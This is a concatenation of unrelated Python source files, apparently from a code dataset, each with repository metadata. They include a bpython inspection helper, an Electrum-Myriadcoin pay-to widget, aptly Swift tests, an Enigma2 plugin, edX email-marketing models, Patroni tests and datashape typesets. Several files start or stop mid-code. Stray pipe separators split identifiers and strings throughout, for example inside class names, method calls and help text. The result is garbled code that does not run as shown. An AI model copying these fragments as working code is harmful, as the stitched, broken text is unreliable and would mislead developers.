substack.append(value)
d = {}
for item in stack:
if len(item) >= 3:
d[item[0]] = ''.join(item[2:])
return d
def fixlongargs(f, argspec):
"""Functions taking default arguments that are references to other objects
whose str() is too big will cause breakage, so we swap out the object
itself with the name it was referenced with in the source by parsing the
source itself !"""
if argspec[3] is None:
# No keyword args, no need to do anything
return
values = list(argspec[3])
if not values:
return
keys = argspec[0][-len(values):]
try:
src = inspect.getsourcelines(f)
except (IOError, IndexError):
# IndexError is raised in inspect.findsource(), can happen in
# some situations. See issue #94.
return
signature = ''.join(src[0])
kwparsed = parsekeywordpairs(signature)
for i, (key, value) in enumerate(zip(keys, values)):
if len(repr(value)) != len(kwparsed[key]):
values[i] = _Repr(kwparsed[key])
argspec[3] = values
def getpydocspec(f, func):
try:
argspec = pydoc.getdoc(f)
except NameError:
return None
rx = re.compile(r'([a-zA-Z_][a-zA-Z0-9_]*?)\((.*?)\)')
s = rx.search(argspec)
if s is None:
return None
if not hasattr(f, '__name__') or s.groups()[0] != f.__name__:
return None
args = list()
defaults = list()
varargs = varkwargs = None
kwonly_args = list()
kwonly_defaults = dict()
for arg in s.group(2).split(','):
arg = arg.strip()
if arg.startswith('**'):
varkwargs = arg[2:]
elif arg.startswith('*'):
varargs = arg[1:]
else:
arg, _, default = arg.partition('=')
if varargs is not None:
kwonly_args.append(arg)
if default:
kwonly_defaults[arg] = default
else:
args.append(arg)
if default:
defaults.append(default)
return [func, (args, varargs, varkwargs, defaults,
kwonly_args, kwonly_defaults)]
def getargspec(func, f):
# Check if it's a real bound method or if it's implicitly calling __init__
# (i.e. FooClass(...) and not FooClass.__init__(...) -- the former would
# not take 'self', the latter would:
try:
func_name = getattr(f, '__name__', None)
except:
# if calling foo.__name__ would result in an error
func_name = None
try:
is_bound_method = ((inspect.ismethod(f) and f.im_self is not None)
or (func_name == '__init__' and not
func.endswith('.__init__')))
except:
# if f is a method from a xmlrpclib.Server instance, func_name ==
# '__init__' throws xmlrpclib.Fault (see #202)
return None
try:
if py3:
argspec = inspect.getfullargspec(f)
else:
argspec = inspect.getargspec(f)
argspec = list(argspec)
fixlongargs(f, argspec)
argspec = [func, argspec, is_bound_method]
except (TypeError, KeyError):
with AttrCleaner(f):
argspec = getpydocspec(f, func)
if argspec is None:
return None
|
cryptapus/electrum-myr | gui/qt/paytoedit.py | Python | mit | 9,506 | 0.00242 | #!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from PyQt4.QtCore import *
from PyQt4.QtGui import *
from qrtextedit import ScanQRTextEdit
import re
from decimal import Decimal
from electrum import bitcoin
import util
RE_ADDRESS = '[1-9A-HJ-NP-Za-km-z]{26,}'
RE_ALIAS = '(.*?)\s*\<([1-9A-HJ-NP-Za-km-z]{26,})\>'
frozen_style = "QWidget { background-color:none; border:none;}"
normal_style = "QPlainTextEdit { }"
class PayToEdit(ScanQRTextEdit):
def __init__(self, win):
ScanQRTextEdit.__init__(self)
self.win = win
self.amount_edit = win.amount_e
self.document().contentsChanged.connect(self.update_size)
self.heightMin = 0
self.heightMax = 150
self.c = None
self.textChanged.connect(self.check_text)
self.outputs = []
self.errors = []
self.is_pr = False
self.is_alias = False
self.scan_f = win.pay_to_URI
self.update_size()
self.payto_address = None
self.previous_payto = ''
def setFrozen(self, b):
self.setReadOnly(b)
self.setStyleSheet(frozen_style if b else normal_style)
for button in self.buttons:
button.setHidden(b)
def setGreen(self):
self.setStyleSheet(util.GREEN_BG)
def setExpired(self):
self.setStyleSheet(util.RED_BG)
def parse_address_and_amount(self, line):
x, y = line.split(',')
out_type, out = self.parse_output(x)
amount = self.parse_amount(y)
return out_type, out, amount
def parse_output(self, x):
try:
address = self.parse_address(x)
return bitcoin.TYPE_ADDRESS, address
except:
script = self.parse_script(x)
return bitcoin.TYPE_SCRIPT, script
def parse_script(self, x):
from electrum.transaction import opcodes, push_script
script = ''
for word in x.split():
if word[0:3] == 'OP_':
assert word in opcodes.lookup
script += chr(opcodes.lookup[word])
else:
script += push_script(word).decode('hex')
return script
def parse_amount(self, x):
if x.strip() == '!':
return '!'
p = pow(10, self.amount_edit.decimal_point())
return int(p * Decimal(x.strip()))
def parse_address(self, line):
r = line.strip()
m = re.match('^'+RE_ALIAS+'$', r)
address = str(m.group(2) if m else r)
assert bitcoin.is_address(address)
return address
def check_text(self):
self.errors = []
if self.is_pr:
return
# filter out empty lines
lines = filter(lambda x: x, self.lines())
outputs = []
total = 0
self.payto_address = None
if len(lines) == 1:
data = lines[0]
if data.startswith("myriadcoin:"):
self.scan_f(data)
return
try:
self.payto_address = self.parse_output(data)
except:
pass
if self.payto_address:
self.win.lock_amount(False)
return
is_max = False
for i, line in enumerate(lines):
try:
_type, to_address, amount = self.parse_address_and_amount(line)
except:
self.errors.append((i, line.strip()))
continue
outputs.append((_type, to_address, amount))
if amount == '!':
is_max = True
else:
total += amount
self.win.is_max = is_max
self.outputs = outputs
self.payto_address = None
if self.win.is_max:
self.win.do_update_fee()
else:
self.amount_edit.setAmount(total if outputs else None)
self.win.lock_amount(total or len(lines)>1)
def get_errors(self):
return self.errors
def get_recipient(self):
return self.payto_address
def get_outputs(self, is_max):
if self.payto_address:
if is_max:
amount = '!'
else:
amount = self.amount_edit.get_amount()
_type, addr = self.payto_address
self.outputs = [(_type, addr, amount)]
return self.outputs[:]
def lines(self):
return unicode(self.toPlainText()).split('\n')
def is_multiline(self):
return len(self.lines()) > 1
def paytomany(self):
self.setText("\n\n\n")
self.update_size()
def update_size(self):
docHeight = self.document().size().height()
h = docHeight*17 + 11
if self.heightMin <= h <= self.heightMax:
self.setMinimumHeight(h)
self.setMaximumHeight(h)
self.verticalScrollBar().hide()
def setCompleter(self, completer):
self.c = completer
self.c.setWidget(self)
self.c.setCompletionMode(QCompleter.PopupCompletion)
self.c.activated.connect(self.insertCompletion)
def insertCompletion(self, completion):
if self.c.widget() != self:
return
tc = self.textCursor()
extra = completion.length() - self.c.completionPrefix().length()
tc.movePosition(QTextCursor.Left)
tc.movePosition(QTextCursor.EndOfWord)
tc.insertText(completion.right(extra))
self.setTextCursor(tc)
def textUnderCursor(self):
tc = self.textCursor()
tc.select(QTextCursor.WordUnderCursor)
return tc.selectedText()
def keyPressEvent(self, e):
if self.isReadOnly():
return
if self.c.popup().isVisible():
if e.key() in [Qt.Key_Enter, Qt.Key_Return]:
e.ignore()
return
if e.key() in [Qt.Key_Tab]:
e.ignore()
return
if e.key() in [Qt.Key_Down, Qt.Key_Up] and not self.is_mult | iline():
e.ignore()
return
QPlainTextEdit.keyPressEvent(self, e)
ctrlOrShift = e.modifiers() and (Qt.ControlModifier or Qt.ShiftModifier)
if self.c is None or (ctrlOrShift and e.text().isEmpty()):
return
eow = QString("~!@#$%^&*()_+{}|:\"<>?,./;'[]\\-=")
hasModifier = | (e.modifiers() != Qt.NoModifier) and not ctrlOrShift;
completionPrefix = self.textUnderCursor()
if hasModifier or e.text().isEmpty() or completionPrefix.length() < 1 or eow.contains(e.text().right(1)):
self.c.popup().hide()
return
if completionPrefix != self.c.completionPrefix():
self.c.setCompletionPrefix(completionPrefix);
self.c.popup().setCurrentIndex(self.c.completionModel().index(0, 0))
cr = self.cursorRect()
cr.setWidth(self.c.popup().sizeHintForColumn(0) + self.c.popup().verticalScrollBar().sizeHint().width())
self.c.complete(cr)
def qr_input(self):
data = super(PayToEdit,self).qr_input()
if data.startswith("myriadcoi |
smira/aptly | system/t06_publish/swift.py | Python | mit | 7,962 | 0.003893 | from swift_lib import SwiftTest
def strip_processor(output):
return "\n".join([l for l in output.split("\n") if not l.startswith(' ') and not l.startswith('Date:')])
class SwiftPublish1Test(SwiftTest):
"""
publish to Swift: from repo
"""
fixtureCmds = [
"aptly repo create -distribution=maverick local-repo",
"aptly repo add local-repo ${files}",
"aptly repo remove local-repo libboost-program-options-dev_1.62.0.1_i386",
]
runCmd = "aptly publish repo -keyring=${files}/aptly.pub -secret-keyring=${files}/aptly.sec local-repo swift:test1:"
def check(self):
super(SwiftPublish1Test, self).check()
self.check_exists('dists/maverick/InRelease')
self.check_exists('dists/maverick/Release')
self.check_exists('dists/maverick/Release.gpg')
self.check_exists('dists/maverick/main/binary-i386/Packages')
self.check_exists('dists/maverick/main/binary-i386/Packages.gz')
self.check_exists('dists/maverick/main/binary-i386/Packages.bz2')
self.check_exists('dists/maverick/main/source/Sources')
self.check_exists('dists/maverick/main/source/Sources.gz')
self.check_exists('dists/maverick/main/source/Sources.bz2')
self.check_exists('pool/main/p/pyspi/pyspi_0.6.1-1.3.dsc')
self.check_exists('pool/main/p/pyspi/pyspi_0.6.1-1.3.diff.gz')
self.check_exists('pool/main/p/pyspi/pyspi_0.6.1.orig.tar.gz')
self.check_exists('pool/main/p/pyspi/pyspi-0.6.1-1.3.stripped.dsc')
self.check_exists('pool/main/b/boost-defaults/libboost-program-options-dev_1.49.0.1_i386.deb')
# # verify contents except of sums
self.check_file_contents('dists/maverick/Release', 'release', match_prepare=strip_processor)
self.check_file_contents('dists/maverick/main/source/Sources', 'sources', match_prepare=lambda s: "\n".join(sorted(s.split("\n"))))
self.check_file_contents('dists/maverick/main/binary-i386/Packages', 'binary', match_prepare=lambda s: "\n".join(sorted(s.split("\n"))))
class SwiftPublish2Test(SwiftTest):
"""
publish to Swift: publish update removed some packages
"""
fixtureCmds = [
"aptly repo create -distribution=maverick local-repo",
"aptly repo add local-repo ${files}/",
"aptly repo remove local-repo libboost-program-options-dev_1.62.0.1_i386",
"aptly publish repo -keyring=${files}/aptly.pub -secret-keyring=${files}/aptly.sec local-repo swift:test1:",
"aptly repo remove local-repo pyspi"
]
runCmd = "aptly publish update -keyring=${files}/aptly.pub -secret-keyring=${files}/aptly.sec maverick swift:test1:"
def check(self):
super(SwiftPublish2Test, self).check()
self.check_exists('dists/maverick/InRelease')
self.check_exists('dists/maverick/Release')
self.check_exists('dists/maverick/Release.gpg')
self.check_exists('dists/maverick/main/binary-i386/Packages')
self.check_exists('dists/maverick/main/binary-i386/Packages.gz')
self.check_exists('dists/maverick/main/binary-i386/Packages.bz2')
self.check_exists('dists/maverick/main/source/Sources')
self.check_exists('dists/maverick/main/source/Sources.gz')
self.check_exists('dists/maverick/main/source/Sources.bz2')
self.check_not_exists('pool/main/p/pyspi/pyspi_0.6.1-1.3.dsc')
self.check_not_exists('pool/main/p/pyspi/pyspi_0.6.1-1.3.diff.gz')
self.check_not_exists('pool/main/p/pyspi/pyspi_0.6.1.orig.tar.gz')
self.check_not_exists('pool/main/p/pyspi/pyspi-0.6.1-1.3.stripped.dsc')
self.check_exists('pool/main/b/boost-defaults/libboost-program-options-dev_1.49.0.1_i386.deb')
# verify contents except of sums
self.check_file_contents('dists/maverick/Release', 'release', match_prepare=strip_processor)
self.check_file_contents('dists/maverick/main/source/Sources', 'sources', match_prepare=lambda s: "\n".join(sorted(s.split("\n"))))
self.check_file_contents('dists/maverick/main/binary-i386/Packages', 'binary', match_prepare=lambda s: "\n".join(sorted(s.split("\n"))))
class SwiftPublish3Test(SwiftTest):
"""
publish to Swift: publish switch - removed some packages
"""
fixtureDB = True
fixturePool = True
fixtureCmds = [
"aptly snapshot create snap1 from mirror gnuplot-maverick",
"aptly snapshot create snap2 empty",
"aptly snapshot pull -no-deps -architectures=i386,amd64 snap2 snap1 snap3 gnuplot-x11",
"aptly publish snapshot -keyring=${files}/aptly.pub -secret-keyring=${files}/aptly.sec -distribution=maverick snap1 swift:test1:",
]
runCmd = "aptly publish switch -keyring=${files}/aptly.pub -secret-keyring=${files}/aptly.sec maverick swift:test1: snap3"
def check(self):
super(SwiftPublish3Test, self).check()
self.check_exists('dists/maverick/InRelease')
self.check_exists('dists/maverick/Release')
self.check_exists('dists/maverick/Release.gpg')
self.check_exists('dists/maverick/main/binary-i386/Packages.gz')
self.check_exists('dists/maverick/main/binary-i386/Packages.bz2')
self.check_exists('dists/maverick/main/binary-amd64/Packages')
self.check_exists('dists/maverick/main/binary-amd64/Packages.gz')
self.check_exists('dists/maverick/main/binary-amd64/Packages.bz2')
self.check_exists('pool/main/g/gnuplot/gnuplot-x11_4.6.1-1~maverick2_i386.deb')
self.check_exists('pool/main/g/gnuplot/gnuplot-x11_4.6.1-1~maverick2_amd64.deb')
self.check_not_exists('pool/main/g/gnuplot/gnuplot-nox_4.6.1-1~maverick2_i386.deb')
self.check_not_exists('pool/main/g/gnuplot/gnuplot-nox_4.6.1-1~maverick2_amd64.deb')
# verify contents except of sums
self.check_file_contents('dists/maverick/Release', 'release', match_prepare=strip_processor)
self.check_file_contents('dists/maverick/main/binary-i386/Packages', 'binary', match_prepare=lambda s: "\n".join(sorted(s.split("\n"))))
class SwiftPublish4Test(SwiftTest):
"""
publish to Swift: multiple repos, list
"""
fixtureCmds = [
"aptly repo create -distribution=maverick local-repo",
"aptly repo add local-repo ${udebs}",
"aptly publish repo -keyring=${files}/aptly.pub -secret-keyring=${files}/aptly.sec local-repo swift:test1:",
"aptly publish repo -keyring=${files}/aptly.pub -secret-keyring=${files}/aptly.sec -distribution=xyz local-repo swift:test1:",
"aptly publish repo -keyring=${files}/aptly.pub -secret-keyring=${files}/aptly.sec local-repo swift:test1:prefix",
]
runCmd = "aptly publish list"
class SwiftPublish5Test(SwiftTest):
"""
publish to Swift: publish drop - component cleanup
"""
fixtureCmds = [
"aptly repo create local1",
"aptly repo create local2",
"aptly repo add local1 ${files}/libboost-program-options-dev_1.49.0.1_i386.deb",
"aptly repo add local2 ${files}",
"aptly publish repo -keyring=${files}/aptly.pub -secret-keyring=${files}/aptly.sec -distribution=sq1 local1 swift:test1:",
"aptly publish repo -keyring=${files}/aptly.pub -secret-keyring=${files}/aptly.sec -distribution=sq2 local2 swift:test1:",
]
runCmd = "aptly publish drop sq2 swift:test1:"
def check(self):
super(S | wiftPublish5Test, self).check()
self.check_exists(' | dists/sq1')
self.check_not_exists('dists/sq2')
self.check_exists('pool/main/')
self.check_not_exists('pool/main/p/pyspi/pyspi_0.6.1-1.3.dsc')
self.check_not_exists('pool/main/p/pyspi/pyspi_0.6.1-1.3.diff.gz')
self.check_not_exists('pool/main/p/pyspi/pyspi_0.6.1.orig.tar.gz')
self.check_not_exists('pool/main/p/pyspi/pyspi-0.6.1-1.3.stripped.dsc')
self.check_exists('pool/main/b/boost-defaults/libboost-program-options-dev_1.49.0.1_i386.deb')
|
popazerty/enigma2 | lib/python/Plugins/Extensions/LDteam/ExtraActionBox.py | Python | gpl-2.0 | 1,524 | 0.022966 | # -*- coding: utf-8 -*-
from enigma import *
from Screens.Screen import Screen
from Components.ActionMap import ActionMap
from Components.MenuList import MenuList
from Components.GUIComponent import GUIComponent
from Components.HTMLComponent import HTMLComponent
from Tools.Directories import fileExists, SCOPE_SKIN_IMAGE, SCOPE_CURRENT_SKIN, resolveFilename
from Components.Label import Label
from Components.MultiContent import MultiContentEntryText, MultiContentEntryPixmapAlphaTest
from Components.Pixmap import Pixmap
from Tools.LoadPixmap import LoadPixmap
class ExtraActionBox(Screen):
skin = """
<screen name="Extr | aActionBox" position="center,center" size="560,70" title=" ">
<widget font="Regular;20" halign="center" name="message" position="10,10" size="538,48" valign="center" />
</screen>"""
def __init__(self, session, message, title, action):
Screen.__init__(self, session)
self.session = session
self.ctitle = title
self.caction = action
self["message | "] = Label(message)
self["logo"] = Pixmap()
self.timer = eTimer()
self.timer.callback.append(self.__setTitle)
self.timer.start(200, 1)
def __setTitle(self):
if self["logo"].instance is not None:
self["logo"].instance.setPixmapFromFile(resolveFilename(SCOPE_CURRENT_SKIN, '/usr/lib/enigma2/python/Plugins/Extensions/LDteam/images/extra/run.png'))
self.setTitle(self.ctitle)
self.timer = eTimer()
self.timer.callback.append(self.__start)
self.timer.start(200, 1)
def __start(self):
self.close(self.caction())
|
eduNEXT/edunext-platform | lms/djangoapps/email_marketing/models.py | Python | agpl-3.0 | 5,191 | 0.002697 | """
Email-marketing-related models.
"""
from config_models.models import ConfigurationModel
from django.db import models
from django.utils.encoding import python_2_unicode_compatible
from django.utils.translation import ugettext_lazy as _
@python_2_unicode_compatible
class EmailMarketingConfiguration(ConfigurationModel):
"""
Email marketing configuration
.. no_pii:
"""
class Meta:
app_label = "email_marketing"
sailthru_key = models.fields.CharField(
max_length=32,
help_text=_(
"API key for accessing Sailthru. "
)
)
sailthru_secret = models.fields.CharField(
max_length=32,
help_text=_(
"API secret for accessing Sailthru. "
)
)
sailthru_new_user_list = models.fields.CharField(
max_length=48,
help_text=_(
"Sailthru list name to add new users to. "
)
)
sailthru_retry_interval = models.fields.IntegerField(
default=3600,
help_text=_(
"Sailthru connection retry interval (secs)."
)
)
sailthru_max_retries = models.fields.IntegerField(
default=24,
help_text=_(
"Sailthru maximum retries."
)
)
sailthru_welcome_template = models.fields.CharField(
max_length=20,
blank=True,
help_text=_(
"Sailthru template to use on welcome send."
)
)
sailthru_abandoned_cart_template = models.fields.CharField(
max_length=20,
blank=True,
help_text=_(
"Sailthru template to use on abandoned cart reminder. Deprecated."
)
)
sailthru_abandoned_cart_delay = models.fields.IntegerField(
default=60,
help_text=_(
"Sailthru minutes to wait before sending abandoned cart message. Deprecated."
)
)
sailthru_enroll_template = models.fields.CharField(
max_length=20,
blank=True,
help_text=_(
"Sailthru send template to use on enrolling for audit. "
)
)
sailthru_verification_passed_template = models.fields.CharField(
max_length=20,
blank=True,
help_text=_(
"Sailthru send template to use on passed ID verification."
)
)
sailthru_verification_failed_template = models.fields.CharField(
max_length=20,
blank=True,
help_text=_(
"Sailthru send template to use on failed ID verification."
)
)
sailthru_upgrade_template = models.fields.CharField(
max_length=20,
blank=True,
help_text=_(
"Sailthru send template to use on upgrading a course. Deprecated "
)
)
sailthru_purchase_template = models.fields.CharField(
max_length=20,
blank=True,
help_text=_(
"Sailthru send tem | plate to use on purchasing a course seat. Deprecated "
)
)
# Sailthru purchases can be tagged with interest tags to provide information about the types of courses
# users are interested in. The easiest way to get the tags currently is the Sailthru content API which
# looks in the content library (the content library is populated daily with a script that pulls the data
# from the c | ourse discovery API) This option should normally be on, but it does add overhead to processing
# purchases and enrolls.
sailthru_get_tags_from_sailthru = models.BooleanField(
default=True,
help_text=_('Use the Sailthru content API to fetch course tags.')
)
sailthru_content_cache_age = models.fields.IntegerField(
default=3600,
help_text=_(
"Number of seconds to cache course content retrieved from Sailthru."
)
)
sailthru_enroll_cost = models.fields.IntegerField(
default=100,
help_text=_(
"Cost in cents to report to Sailthru for enrolls."
)
)
sailthru_lms_url_override = models.fields.CharField(
max_length=80,
blank=True,
help_text=_(
"Optional lms url scheme + host used to construct urls for content library, e.g. https://courses.edx.org."
)
)
# The number of seconds to delay for welcome emails sending. This is needed to acommendate those
# learners who created user account during course enrollment so we can send a different message
# in our welcome email.
welcome_email_send_delay = models.fields.IntegerField(
default=600,
help_text=_(
"Number of seconds to delay the sending of User Welcome email after user has been created"
)
)
# The number of seconds to delay/timeout wait to get cookie values from sailthru.
user_registration_cookie_timeout_delay = models.fields.FloatField(
default=3.0,
help_text=_(
"The number of seconds to delay/timeout wait to get cookie values from sailthru."
)
)
def __str__(self):
return "Email marketing configuration: New user list %s, Welcome template: %s" % \
(self.sailthru_new_user_list, self.sailthru_welcome_template)
|
CityOfNewYork/NYCOpenRecords | tests/functional/test_requests.py | Python | apache-2.0 | 170 | 0.005882 | # -*- coding: utf-8 | -*-
"""Test Request Module
This module contains the tests for the OpenRecords `/request` | endpoint.
"""
import pytest
from app.models import Requests |
sean-/patroni | tests/test_patroni.py | Python | mit | 7,260 | 0.001102 | import datetime
import patroni.zookeeper
import psycopg2
import subprocess
import sys
import time
import unittest
import yaml
from mock import Mock, patch
from patroni.api import RestApiServer
from patroni.dcs import Cluster, Member, Leader
from patroni.etcd import Etcd
from patroni.exceptions import DCSError, PostgresException
from patroni import Patroni, main
from patroni.zookeeper import ZooKeeper
from six.moves import BaseHTTPServer
from test_api import Mock_BaseServer__is_shut_down
from test_etcd import Client, etcd_read, etcd_write
from test_ha import true, false
from test_postgresql import Postgresql, subprocess_call, psycopg2_connect
from test_zookeeper import MockKazooClient
def nop(*args, **kwargs):
pass
class SleepException(Exception):
pass
def time_sleep(*args):
raise SleepException()
def keyboard_interrupt(*args):
raise KeyboardInterrupt
class Mock_BaseServer__is_shut_down:
def wait(self):
pass
def set(self):
pass
def clear(self):
pass
def get_cluster(initialize, leader):
return Cluster(initialize, leader, None, None)
def get_cluster_not_initialized_without_leader():
return get_cluster(None, None)
def get_cluster_initialized_without_leader():
return get_cluster(True, None)
def get_cluster_not_initialized_with_leader():
return get_cluster(False, Leader(0, 0, 0,
Member(0, 'leader', 'postgres://replicator:rep-pass@127.0.0.1:5435/postgres',
None, None, 28)))
def get_cluster_initialized_with_leader():
return get_cluster(True, Leader(0, 0, 0,
Member(0, 'leader', 'postgres://replicator:rep-pass@127.0.0.1:5435/postgres',
None, None, 28)))
def get_cluster_dcs_error():
raise DCSError('')
class TestPatroni(unittest.TestCase):
def __init__(self, method_name='runTest'):
self.setUp = self.set_up
self.tearDown = self.tear_down
super(TestPatroni, self).__init__(method_name)
def set_up(self):
self.touched = False
self.init_cancelled = False
subprocess.call = subprocess_call
psycopg2.connect = psycopg2_connect
self.time_sleep = time.sleep
time.sleep = nop
self.write_pg_hba = Postgresql.write_pg_hba
self.write_recovery_conf = Postgresql.write_recovery_conf
Postgresql.write_pg_hba = nop
Postgresql.write_recovery_conf = nop
BaseHTTPServer.HTTPServer.__init__ = nop
RestApiServer._BaseServer__is_shut_down = Mock_BaseServer__is_shut_down()
RestApiServer._BaseServer__shutdown_request = True
RestApiServer.socket = 0
with open('postgres0.yml', 'r') as f:
config = yaml.load(f)
with patch.object(Client, 'machines') as mock_machines:
mock_machines.__get__ = Mock(return_value=['http://remotehost:2379'])
self.p = Patroni(config)
def tear_down(self):
time.sleep = self.time_sleep
Postgresql.write_pg_hba = self.write_pg_hba
Postgresql.write_recovery_conf = self.write_recovery_conf
def test_get_dcs(self):
patroni.zookeeper.KazooClient = MockKazooClient
self.assertIsInstance(self.p.get_dcs('', {'zookeeper': {'scope': '', 'hosts': ''}}), ZooKeeper)
self.assertRaises(Exception, self.p.get_dcs, '', {})
def test_patroni_main(self):
main()
sys.argv = ['patroni.py', 'postgres0.yml']
time.sleep = time_sleep
with patch.object(Client, 'machines') as mock_machines:
mock_machines.__get__ = Mock(return_value=['http://remotehost:2379'])
Patroni.initialize = nop
touch_member = Patroni.touch_member
run = Patroni.run
Patroni.touch_member = self.touch_member
Patroni.run = time_sleep
Etcd.delete_leader = nop
self.assertRaises(SleepException, main)
Patroni.run = keyboard_interrupt
main()
Patroni.run = run
Patroni.touch_member = touch_member
def test_patroni_run(self):
time.sleep = time_sleep
self.p.touch_member = self.touch_member
self.p.ha.state_handler.sync_replication_slots = time_sleep
self.p.ha.dcs.client.read = etcd_read
self.p.ha.dcs.watch = time_sleep
self.assertRaises(SleepException, self.p.run)
self.p.ha.state_handler.is_leader = false
self.p.api.start = nop
self.assertRaises(SleepException, self.p.run)
def touch_member(self, ttl=None):
if not self.touched:
self.touched = True
return False
return True
def test_touch_member(self):
self.p.ha.dcs.client.write = etcd_write
self.p.touch_member()
now = datetime.datetime.utcnow()
member = Member(0, self.p.postgresql.name, 'b', 'c', (now + datetime.timedelta(
seconds=self.p.shutdown_member_ttl + 10)).strftime('%Y-%m-%dT%H:%M:%S.%fZ'), None)
self.p.ha.cluster = Cluster(True, member, 0, [member])
self.p.touch_member()
def test_patroni_initialize(self):
self.p.ha.dcs.client.write = etcd_write
self.p.ha.dcs.client.read = etcd_read
self.p.touch_member = self.touch_m | ember
self.p.postgresql.data_directory_empty = true
self.p.ha.dcs.initialize = true
self.p.postgresql.initialize = true
self.p.postgresql.start = true
self.p.ha.dcs.get_cluster = get_cluster_not_initialized_without_leader
self.p.initialize()
self.p.ha.dcs.initialize = false
self.p.ha.dcs.get_cluster = get_cluster_initialized_with_leader
time.sleep = time_sleep
self.p.ha.dcs.client.read = etcd_read
| self.p.initialize()
self.p.ha.dcs.get_cluster = get_cluster_initialized_without_leader
self.assertRaises(SleepException, self.p.initialize)
self.p.postgresql.data_directory_empty = false
self.p.initialize()
self.p.ha.dcs.get_cluster = get_cluster_not_initialized_with_leader
self.p.postgresql.data_directory_empty = true
self.p.initialize()
self.p.ha.dcs.get_cluster = get_cluster_dcs_error
self.assertRaises(SleepException, self.p.initialize)
def test_schedule_next_run(self):
self.p.ha.dcs.watch = lambda e: True
self.p.schedule_next_run()
self.p.next_run = time.time() - self.p.nap_time - 1
self.p.schedule_next_run()
def cancel_initialization(self):
self.init_cancelled = True
def test_cleanup_on_initialization(self):
self.p.ha.dcs.client.write = etcd_write
self.p.ha.dcs.client.read = etcd_read
self.p.ha.dcs.get_cluster = get_cluster_not_initialized_without_leader
self.p.touch_member = self.touch_member
self.p.postgresql.data_directory_empty = true
self.p.ha.dcs.initialize = true
self.p.postgresql.initialize = true
self.p.postgresql.start = false
self.p.ha.dcs.cancel_initialization = self.cancel_initialization
self.assertRaises(PostgresException, self.p.initialize)
self.assertTrue(self.init_cancelled)
|
ContinuumIO/datashape | datashape/typesets.py | Python | bsd-2-clause | 5,475 | 0.000731 | """
Traits constituting sets of types.
"""
from itertools import chain
from .coretypes import (Unit, int8, int16, int32, int64, uint8, uint16, uint32,
uint64, float16, float32, float64, complex64,
complex128, bool_, Decimal, TimeDelta, Option)
__all__ = ['TypeSet', 'matches_typeset', 'signed', 'unsigned', 'integral',
'floating', 'complexes', 'boolean', 'numeric', 'scalar',
'maxtype']
class TypeSet(Unit):
"""
Create a new set of types. Keyword argument 'name' may create a registered
typeset for use in datashape type strings.
"""
__slots__ = '_order', 'name'
def __init__(self, *args, **kwds):
self._order = args
self.name = kwds.get('name')
if self.name:
register_typeset(self.name, self)
@property
def _set(self):
return set(self._order)
@property
def types(self):
return self._order
def __eq__(self, other):
return (isinstance(other, type(self)) and
self.name == other.name and self.types == other.types)
def __hash__(self):
return hash((self.name, self.types))
def __contains__(self, val):
return val in self._set
def __repr__(self):
if self.name:
return '{%s}' % (self.name,)
return "%s(%s, name=%s)" % (self.__class__.__name__, self._set,
self.name)
def __or__(self, other):
return TypeSet(*chain(self, other))
def __iter__(self):
return iter(self._order)
def __len__(self):
return len(self._set)
def matches_typeset(types, signature):
"""Match argument types to the parameter types of a signature
>>> matches_typeset(int32, integral)
True
>>> matches_typeset(float32, integral)
False
>>> matches_typeset(integral, real)
True
"""
if types in signature:
return True
match = True
for a, b in zip(types, signature):
check = isinstance(b, TypeSet)
if check and (a not in b) or (not check and a != b):
match = False
break
return match
class TypesetRegistry(object):
def __init__(self):
self.registry = {}
self.lookup = self.registry.get
def register_typeset(self, name, typeset):
if name in self.registry:
raise TypeError("TypeSet %s already defined with types %s" %
(name, self.registry[name].types))
self.registry[name] = typeset
return typeset
def __getitem__(self, key):
value = self.lookup(key)
if value is None:
raise KeyError(key)
return value
registry = TypesetRegistry()
register_typeset = registry.register_typeset
lookup = registry.lookup
#------------------------------------------------------------------------
# Default Type Sets
#------------------------------------------------------------------------
signed = TypeSet(int8, int16, int32, int64, name='signed')
unsigned = TypeSet(uint8, uint16, uint32, uint64, name='unsigned')
integral = TypeSet(*[x for t in zip(signed, unsigned) for x in t],
| name='integral')
floating = TypeSet(float32, float64, name='floating')
comp | lexes = TypeSet(complex64, complex128, name='complexes')
boolean = TypeSet(bool_, name='boolean')
real = TypeSet(*integral | floating, name='real')
numeric = TypeSet(*integral | floating | complexes, name='numeric')
scalar = TypeSet(*boolean | numeric, name='scalar')
supertype_map = {
int8: signed,
int16: signed,
int32: signed,
int64: signed,
uint8: unsigned,
uint16: unsigned,
uint32: unsigned,
uint64: unsigned,
float16: floating,
float32: floating,
float64: floating,
complex64: complexes,
complex128: complexes,
bool_: boolean
}
def supertype(measure):
"""Get the super type of a concrete numeric type
Examples
--------
>>> supertype(int8)
{signed}
>>> supertype(float32)
{floating}
>>> supertype(complex128)
{complexes}
>>> supertype(bool_)
{boolean}
>>> supertype(Option(bool_))
{boolean}
"""
if isinstance(measure, Option):
measure = measure.ty
assert matches_typeset(measure, scalar), 'measure must be numeric'
return supertype_map[measure]
def maxtype(measure):
"""Get the maximum width for a particular numeric type
Examples
--------
>>> maxtype(int8)
ctype("int64")
>>> maxtype(Option(float64))
Option(ty=ctype("float64"))
>>> maxtype(bool_)
ctype("bool")
>>> maxtype(Decimal(11, 2))
Decimal(precision=11, scale=2)
>>> maxtype(Option(Decimal(11, 2)))
Option(ty=Decimal(precision=11, scale=2))
>>> maxtype(TimeDelta(unit='ms'))
TimeDelta(unit='ms')
>>> maxtype(Option(TimeDelta(unit='ms')))
Option(ty=TimeDelta(unit='ms'))
"""
measure = measure.measure
